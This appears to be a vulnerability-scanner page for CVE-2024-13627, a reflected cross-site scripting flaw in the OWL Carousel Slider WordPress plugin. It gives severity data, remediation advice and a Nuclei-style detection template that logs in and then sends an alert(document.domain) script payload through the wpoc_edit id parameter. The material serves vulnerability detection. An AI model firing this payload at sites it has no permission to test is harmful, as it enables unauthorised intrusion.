OWL Carousel Slider - Cross-Site Scripting
CVE-2024-13627
Verified
Description
OWL Carousel Slider WordPress plugin v2.2 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.
Severity
Medium
CVSS Score
4.7
Exploit Probability
1%
Affected Product
owl_carousel_slider
Published Date
February 7, 2026
Template Author
sourabh-sahu
CVE-2024-13627.yaml
id: CVE-2024-13627
info:
name: OWL Carousel Slider - Cross-Site Scripting
author: Sourabh-Sahu
severity: medium
description: |
OWL Carousel Slider WordPress plugin v2.2 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.
impact: |
Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
remediation: |
Update to the latest version of the plugin where the issue is fixed or apply security patches that sanitize and escape parameters properly.
reference:
- https://wpscan.com/vulnerability/f7e425a1-ae49-4ea6-abe4-42ba2713af8f/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
cvss-score: 4.7
cve-id: CVE-2024-13627
cwe-id: CWE-79
epss-score: 0.00805
epss-percentile: 0.52439
cpe: cpe:2.3:a:wp-buy:owl_carousel_slider:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wp-buy
product: owl_carousel_slider
tags: cve,cve2024,wp-scan,wp-plugin,wp-buy,owl-carousel-slider
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=
matchers:
- type: dsl
dsl:
- contains(header, "wordpress_logged_in")
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=wpoc_edit&id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "></script><script>alert(document.domain)</script><script>")
condition: and
# digest: 4b0a00483046022100e1480de62677c201467e1dfd328d0eecd8fa6031909a06bb431a07949576c74d022100ca11372452c88d6700bfb0716bb2ff8e6b878a31d24d1b56a1ec1ffb101fe99a:922c64590222798bb761d5b6d8e729504.7Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CVE ID:
cve-2024-13627
CWE ID:
cwe-79
Remediation Steps
Update to the latest version of the plugin where the issue is fixed or apply security patches that sanitize and escape parameters properly.